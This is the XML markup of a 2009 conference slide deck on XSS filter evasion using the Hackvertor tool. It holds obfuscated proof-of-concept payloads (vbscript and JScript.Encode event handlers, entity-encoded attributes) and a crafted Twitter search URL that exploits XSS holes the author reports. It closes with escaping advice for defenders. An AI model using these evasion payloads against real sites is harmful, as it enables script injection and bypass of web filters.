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84" r:id="rId6"/>
    <p:sldId id="260" r:id="rId7"/>
    <p:sldId id="261" r:id="rId8"/>
    <p:sldId id="262" r:id="rId9"/>
    <p:sldId id="263" r:id="rId10"/>
    <p:sldId id="264" r:id="rId11"/>
    <p:sldId id="285" r:id="rId12"/>
    <p:sldId id="286" r:id="rId13"/>
    <p:sldId id="266" r:id="rId14"/>
    <p:sldId id="287" r:id="rId15"/>
    <p:sldId id="267" r:id="rId16"/>
    <p:sldId id="288" r:id="rId17"/>
    <p:sldId id="268" r:id="rId18"/>
    <p:sldId id="289" r:id="rId19"/>
    <p:sldId id="290" r:id="rId20"/>
    <p:sldId id="265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80" r:id="rId29"/>
    <p:sldId id="277" r:id="rId30"/>
    <p:sldId id="278" r:id="rId31"/>
    <p:sldId id="279" r:id="rId32"/>
    <p:sldId id="291" r:id="rId33"/>
    <p:sldId id="292" r:id="rId34"/>
    <p:sldId id="300" r:id="rId35"/>
    <p:sldId id="281" r:id="rId36"/>
    <p:sldId id="282" r:id="rId37"/>
    <p:sldId id="293" r:id="rId38"/>
    <p:sldId id="294" r:id="rId39"/>
    <p:sldId id="295" r:id="rId40"/>
    <p:sldId id="296" r:id="rId41"/>
    <p:sldId id="297" r:id="rId42"/>
    <p:sldId id="298" r:id="rId43"/>
    <p:sldId id="299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29" autoAdjust="0"/>
    <p:restoredTop sz="94576" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="75" d="100"/>
          <a:sy n="75" d="100"/>
        </p:scale>
        <p:origin x="-954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A1704-CC25-4D19-9A7D-90FBD7AFD5BC}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11/18/2009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270B7C-31A0-44AD-A935-5BD2B3C58C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70B7C-31A0-44AD-A935-5BD2B3C58C41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643050"/>
            <a:ext cx="9144000" cy="521495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08" y="252397"/>
            <a:ext cx="1905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5338" y="459254"/>
            <a:ext cx="47625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29F9-3D9B-4C8D-9D58-1E1043BBD8C0}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11/18/2009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62A8B-9352-4275-AF74-3249AFA97BE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29F9-3D9B-4C8D-9D58-1E1043BBD8C0}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11/18/2009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62A8B-9352-4275-AF74-3249AFA97BE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29F9-3D9B-4C8D-9D58-1E1043BBD8C0}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11/18/2009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62A8B-9352-4275-AF74-3249AFA97BE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29F9-3D9B-4C8D-9D58-1E1043BBD8C0}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11/18/2009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62A8B-9352-4275-AF74-3249AFA97BE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29F9-3D9B-4C8D-9D58-1E1043BBD8C0}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11/18/2009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62A8B-9352-4275-AF74-3249AFA97BE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29F9-3D9B-4C8D-9D58-1E1043BBD8C0}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11/18/2009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62A8B-9352-4275-AF74-3249AFA97BE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29F9-3D9B-4C8D-9D58-1E1043BBD8C0}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11/18/2009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62A8B-9352-4275-AF74-3249AFA97BE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29F9-3D9B-4C8D-9D58-1E1043BBD8C0}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11/18/2009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62A8B-9352-4275-AF74-3249AFA97BE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29F9-3D9B-4C8D-9D58-1E1043BBD8C0}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11/18/2009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62A8B-9352-4275-AF74-3249AFA97BE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29F9-3D9B-4C8D-9D58-1E1043BBD8C0}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11/18/2009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62A8B-9352-4275-AF74-3249AFA97BE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29F9-3D9B-4C8D-9D58-1E1043BBD8C0}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11/18/2009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62A8B-9352-4275-AF74-3249AFA97BE0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129F9-3D9B-4C8D-9D58-1E1043BBD8C0}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11/18/2009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62A8B-9352-4275-AF74-3249AFA97BE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5786" y="4030677"/>
            <a:ext cx="7772400" cy="1470025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lightsabre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> techniques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0166" y="5105400"/>
            <a:ext cx="6400800" cy="1752600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hackvertor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2071678"/>
            <a:ext cx="2976550" cy="2160975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="349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Helpful shortcuts continued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Quickly convert ranges</a:t>
            </a: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of numbers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&lt;@dec2bin_10(',')&gt;&lt;@range_9(100)&gt;1&lt;@/range_9&gt;&lt;@/dec2bin_10&gt;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First inner tag creates a range of number from 1 to 100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Second outer tag splits the commas and converts each number to binary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Use ranges and convert each number into their character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&lt;@fromcharcodes_11&gt;&lt;@range_9(100)&gt;1&lt;@/range_9&gt;&lt;@/fromcharcodes_11&gt;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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hackvertlets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Use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Hackvertor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input with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bookmarklets</a:t>
            </a:r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Select text from a page to interact with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Hackvertor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from any web site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Quickly create arrays from a selection in any language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Useful for XSS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fuzzing</a:t>
            </a:r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Write less code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Layered tagging makes it easy to gather correct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5786" y="3071810"/>
            <a:ext cx="7772400" cy="1470025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The techniques…</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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Obfuscation/Filter evasion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Remember the Language attribute?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Language specifies the scripting language of an attribute event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Also force scripting language without language attribute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XSS injections can force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vbscript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using either of above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Why? Filter evasion, WAF bypass and obfuscation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8643998" cy="785817"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr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Obfuscation/Filter evasion examples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en-GB" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="36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3600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>=1 language=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>vbs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="36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3600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>=msgbox+1&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="36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3600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>=1 language=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>vbscript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="36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3600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>=msgbox+1&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="36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3600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>=vbs:msgbox+1&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-GB" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> Test in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Hackvertor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> by placing in output and then “HTML test”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Obfuscation/Filter evasion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All attributes can be HTML entity encoded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Great for filter evasion (no parenthesis)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Combine multiple escapes/encoding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Javascript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supports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unicode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escapes, hex, octal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Combine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Javascript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escapes with HTML encoding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Layer languages and encoding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execScript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("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MsgBox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1","vbscript"); //executes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vbs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from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js</a:t>
            </a:r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execScript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('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execScript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"alert(1)","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javascript"',"vbscript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");</a:t>
            </a:r>
            <a:b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//executes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vbs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from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js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then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js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from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vbs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  <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r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8715436" cy="785817"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr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Obfuscation/Filter evasion examples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en-GB" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="36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3600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>=&amp;#118;&amp;#98;&amp;#115;&amp;#58;msgbox+1&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;body </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>=`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>vbs:execScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> "alert(1)","&amp;#x6a;avascript"`&gt;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Obfuscation/Filter evasion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Undocumented stuff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  <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>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  <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> Language also accepts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  <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>vbscript.encode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  <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> and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  <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>jscript.encode</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
            </a:endParaRP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  <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> Ultimate obfuscation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  <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> Unicode/hex/octal escapes+ from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  <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>vbscript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  <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> to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  <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>js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  <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> to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  <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>vbscript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  <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> +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  <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>vbscript.encode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  <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> + html encoding you get the idea </a:t>
            </a:r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Obfuscation/Filter evasion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 lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/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&lt;a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href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=# language="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JScript.Encode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"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onclick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="#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@"&gt;test&lt;/a&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/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&lt;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iframe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onload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=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JScript.Encode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:#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/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&lt;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iframe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onload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=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VBScript.Encode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:#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@&gt;  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/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&lt;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iframe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onload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=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>VBScript&amp;#46;Encode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:#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/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Obfuscation/Filter evasion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Force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vbs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inside event,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execScript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with type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jscript.encode</a:t>
            </a:r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l"/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l"/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&lt;body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onload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='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vbs:execScript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"#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@","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jscript.encode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"'&gt;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What is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hackvertor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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7558118" cy="3857652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</a:rPr>
              <a:t> Tag based conversion tool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial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Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> property checker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/HTML execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> DOM browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Saves you writing code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Free and no ads! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Whoo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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hoo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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290" y="5105400"/>
            <a:ext cx="6400800" cy="1752600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>“[Luke:] I can’t believe it. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>[Yoda:] That is why you fail.”</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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857364"/>
            <a:ext cx="3871913" cy="2930621"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="34925">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="9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Twitter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Classic case of misidentifying context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Lets do a search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twitterTheseResults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(' \&amp;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quot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;\'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xss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','/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search?q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=&amp;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amp;a</a:t>
            </a:r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Safe right?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Within a “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onclick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” event inside a single quote, how can we escape?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Attribute accepts html entities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Escapes \&amp;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quot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; and \’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Twitter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&amp;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apos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; Works in Firefox and others except IE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&amp;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apos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; is translated into a ‘ within the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javascript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event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Reported 1 month ago to twitter had 6 XSS holes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Still has 2 XSS holes (At least they’ve fixed some)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&lt;a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href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=#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onclick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="x= '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>USERINPUT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‘ "&gt;test&lt;/a&gt;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E.g. &amp;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apos;,alert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(1),&amp;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apos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;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These work cross browser:-</a:t>
            </a:r>
            <a:b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&amp;#39; &amp;#x27; &amp;#39 &amp;#x27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Lets tweet these results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http://search.twitter.com/search?q=&amp;ands=blackhat+video&amp;phrase=%26apos;%29,alert%281,%26apos;&amp;ors=%26apos;%29,alert%281,%26apos;&amp;nots=%26apos;%29,alert%281,%26apos;&amp;tag=%26apos;%29,alert%281,%26apos;&amp;lang=all%26apos;,alert%281,%26apos;&amp;from=%26apos;%29,alert%281,%26apos;&amp;to=%26apos;%29,alert%281,%26apos;&amp;ref=%26apos;%29,alert%281,%26apos;&amp;near=%26apos;%29,alert%281,%26apos;&amp;within=15%26apos;%29,alert%281,%26apos;&amp;units=mi%26apos;%29,alert%281,%26apos;&amp;since=%26apos;%29,alert%281,%26apos;&amp;until=%26apos;%29,alert%281,%26apos;&amp;rpp=%26apos;%29,alert%281,%26apos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945227"/>
            <a:ext cx="7724777" cy="4484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Replicate tests in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hackvertor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b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>http://tinyurl.com/xssyoda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b="1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Always escape all strings inside JS events with hex, octal or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unicode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escapes. E.g. \x27 (Should be safe)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Encode all user input just to be safe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Or don’t place user input within events!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr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928802"/>
            <a:ext cx="3667134" cy="4664594"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="349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214282" y="3143248"/>
            <a:ext cx="4500594" cy="2000264"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>“Don't be too proud of this technological terror you've constructed”</a:t>
            </a:r>
          </a:p>
          <a:p>
